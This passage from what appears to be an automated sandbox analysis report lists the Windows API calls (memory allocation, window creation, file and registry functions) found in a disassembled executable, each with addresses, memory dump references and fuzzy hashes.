                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 2087232378-0
                                                                                  • Opcode ID: 7d9236a51a6e62d759a8b4f250f4c89c76a4556442c2f53cae6702f33709ebd9
                                                                                  • Instruction ID: 72296c24d993e0564b30de85c6f195fe79285825457dd4606d191d555c4bfbf2
                                                                                  • Opcode Fuzzy Hash: 7d9236a51a6e62d759a8b4f250f4c89c76a4556442c2f53cae6702f33709ebd9
                                                                                  • Instruction Fuzzy Hash: D1F08272B0063067EB605A6A4C81B6359849BC5794F254076FD09FF3E9D6B58C0142A9
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408722), ref: 0040860B
                                                                                    • Part of subcall function 00406DFC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E19
                                                                                    • Part of subcall function 00408578: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049C4C0,00000001,?,00408643,?,00000000,00408722), ref: 00408596
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1658689577-0
                                                                                  • Opcode ID: 5823267eaa6e0e7ee692efbee1c67039304ac956db3a02cff78b9572607a147c
                                                                                  • Instruction ID: 87d691d9fb5281b9ea88bf14f35752b700db14023ee960ec0a49684e6ef053d8
                                                                                  • Opcode Fuzzy Hash: 5823267eaa6e0e7ee692efbee1c67039304ac956db3a02cff78b9572607a147c
                                                                                  • Instruction Fuzzy Hash: AF316135E00109ABCB00DF55C8C19EEB779FF84314F51857BE815BB296EB38AE018B98
                                                                                  APIs
                                                                                  • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoScroll
                                                                                  • String ID:
                                                                                  • API String ID: 629608716-0
                                                                                  • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                  • Instruction ID: de9d69d4b93587d9dbc4e1ffcd6d3196287cd482c57983938f35f532835c4bfd
                                                                                  • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                  • Instruction Fuzzy Hash: 59213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                  APIs
                                                                                    • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                    • Part of subcall function 0041EEB4: EnumThreadWindows.USER32(00000000,0041EE64,00000000), ref: 0041EF09
                                                                                  • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C5AE,?,00000000,?,?,0046C7C0,?,00000000,0046C834), ref: 0046C592
                                                                                    • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                    • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3319771486-0
                                                                                  • Opcode ID: cb068eb5dc710ff6006224cfa849e4d5ce5cc64b4f431f923f3b0af9e5388d0c
                                                                                  • Instruction ID: d90c9d50ec1a4df7de9101e34a36142223e0e09c2726da2ffd76a0a6e3d4faee
                                                                                  • Opcode Fuzzy Hash: cb068eb5dc710ff6006224cfa849e4d5ce5cc64b4f431f923f3b0af9e5388d0c
                                                                                  • Instruction Fuzzy Hash: 3CF0B471608300BFE7059B62EC56B257BA8D708714F91047BF40586290E5BD6844C55E
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                  • Instruction ID: 093968fef036cde5cefa550fbb81a5587008482849b5a1bc4febea26ac521eef
                                                                                  • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                  • Instruction Fuzzy Hash: 2AF09030105109DFAF0CCF58D0669AF77A5EB48314B20807FEA0B877A0C634AE80D759
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 5ff731208ea2669c00132db587fc5b09c37a3f2098bcfa82a293bed1c7b74572
                                                                                  • Instruction ID: bf23e32d75ed6c1bba1609a99bdb6fc4fe5539f7daeb337dc53a21feff163cdc
                                                                                  • Opcode Fuzzy Hash: 5ff731208ea2669c00132db587fc5b09c37a3f2098bcfa82a293bed1c7b74572
                                                                                  • Instruction Fuzzy Hash: 22F019B2200510AFDB84CEDCD8C0F9373ECEB0C250B0481A6BA08CB21AD220EC108BB0
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                  • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                  • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                  • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450878
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: c47705c650c03eeb3fa213ca8ef127fbab7ce4e86e84a6a981bf3da871867329
                                                                                  • Instruction ID: ad17be180c76723165afa97522f1f8cb50e5cc3c1ac5aed9be9dbb48c14aba74
                                                                                  • Opcode Fuzzy Hash: c47705c650c03eeb3fa213ca8ef127fbab7ce4e86e84a6a981bf3da871867329
                                                                                  • Instruction Fuzzy Hash: D9E0EDB53441583ED6809AAC6C42F9677DC971A724F018433B998D7241D4619D258BE9
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A99,00000000,00452ABA,?,00000000), ref: 0042CD07
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 9c61d9913643e7fc8a87719d436576f713db19c75eb1cc22161a8dfdf450bb3f
                                                                                  • Instruction ID: e42bb19430493de12fff977eb98fa38a093f16e856f4d8eabd15c7f5a46843e5
                                                                                  • Opcode Fuzzy Hash: 9c61d9913643e7fc8a87719d436576f713db19c75eb1cc22161a8dfdf450bb3f
                                                                                  • Instruction Fuzzy Hash: 7DE06571314308BBD701EB62EC92A5EBAECD749714B914476B400D7592D5B86E008468
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004532E7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 7e342571288affc5bafe57b4e7aa38107ccfa77ae99db5e17a7a6f0d9f50f535
                                                                                  • Instruction ID: 7522df6bb5b7b377145cdc83deeae8a000ac75e555bea28060da8a54cd92ba64
                                                                                  • Opcode Fuzzy Hash: 7e342571288affc5bafe57b4e7aa38107ccfa77ae99db5e17a7a6f0d9f50f535
                                                                                  • Instruction Fuzzy Hash: F6E0D86178432126F23524166C43B7B110E43C0704FD440267A809F3D2D6EE9946425E
                                                                                  APIs
                                                                                  • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AFAB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPointText
                                                                                  • String ID:
                                                                                  • API String ID: 566491939-0
                                                                                  • Opcode ID: 659619b104fd3feb772cd8971a1adc9358da70abd3c785c83c8eafe460c49850
                                                                                  • Instruction ID: cc428d1e896f501deb349ed904fe83369ead32346870d879665800f49654eebb
                                                                                  • Opcode Fuzzy Hash: 659619b104fd3feb772cd8971a1adc9358da70abd3c785c83c8eafe460c49850
                                                                                  • Instruction Fuzzy Hash: 8EE026F13092002B9200E67E1CC1C9BA7DC8A0822A300823AF808E73C2D62CCD1A03AE
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                  • Instruction ID: 1e3b386673cc32b76f3712ab4659b14af7d7742474b1f2ca80afcc4f691b27f6
                                                                                  • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                  • Instruction Fuzzy Hash: 26E002B221430DBFDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972528675AC608B71
                                                                                  APIs
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 04d8f955b4ea1680ce84362706bb61212f931f51abc1de06f6e1381d22c6f23e
                                                                                  • Instruction ID: a58665afa9aaed36f31adbd0eb633891456326e8230674c5ed5073cd96bdc880
                                                                                  • Opcode Fuzzy Hash: 04d8f955b4ea1680ce84362706bb61212f931f51abc1de06f6e1381d22c6f23e
                                                                                  • Instruction Fuzzy Hash: DDE07EB6600119AF9B40DE8CDC81EEB37ADAB5D350F454016FA08EB200C2B8EC519BA4
                                                                                  APIs
                                                                                  • FindClose.KERNEL32(00000000,000000FF,00470B64,00000000,0047197A,?,00000000,004719C5,?,00000000,00471AFE,?,00000000,?,00000000), ref: 00454C82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: 7eca246021524149fec22f5b43aaa658f949ce3293e179ae35ef6e6ce88d0451
                                                                                  • Instruction ID: ed6c632c5edb2c773ab29dc4195d65b8984e4b681e68d3fe1efecde2d4089f6a
                                                                                  • Opcode Fuzzy Hash: 7eca246021524149fec22f5b43aaa658f949ce3293e179ae35ef6e6ce88d0451
                                                                                  • Instruction Fuzzy Hash: 3AE09B705056004BCB15DF3A858131A76D15FC5324F05C96AAC5CCF3D7D63C84554717
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(004960BE,?,004960E0,?,?,00000000,004960BE,?,?), ref: 004146AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                  • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                  • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                  • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 3762a51e43609c3b4bae8470f6c1dc5ae0f0561e9ae868b0f3c10d30521955a8
                                                                                  • Instruction ID: f35b24215c0fdc632c147a12649f74ed31c2b31f11cb39250bbd2ff5eed7ffe6
                                                                                  • Opcode Fuzzy Hash: 3762a51e43609c3b4bae8470f6c1dc5ae0f0561e9ae868b0f3c10d30521955a8
                                                                                  • Instruction Fuzzy Hash: 5CD012723081506AD220A65A6C44EAB6ADCCBC5770F11063AB558D2181D6209C018675
                                                                                  APIs
                                                                                    • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                  • ShowWindow.USER32(00410470,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                    • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3202724764-0
                                                                                  • Opcode ID: 8bec8c91e4db80f916d04adf4cce8d640474384e6a809fab131d495f4cf7285d
                                                                                  • Instruction ID: 62f98a927e5d18dfd067733e82cc858d6425e225367395d1bb64f11078388387
                                                                                  • Opcode Fuzzy Hash: 8bec8c91e4db80f916d04adf4cce8d640474384e6a809fab131d495f4cf7285d
                                                                                  • Instruction Fuzzy Hash: 03D05E123831B03146307BB728059CB86AC8DD66AB389047BB5409B303E91D8A0A51AC
                                                                                  APIs
                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: TextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 530164218-0
                                                                                  • Opcode ID: 7b629e4230a16754486ed56ae920d883ae8ae6fbac6fb4db25cd6a5c7ea909d6
                                                                                  • Instruction ID: 45ecccad5147b2ee88577654b541c8e67cd655c44182ff5547076257999a9e8e
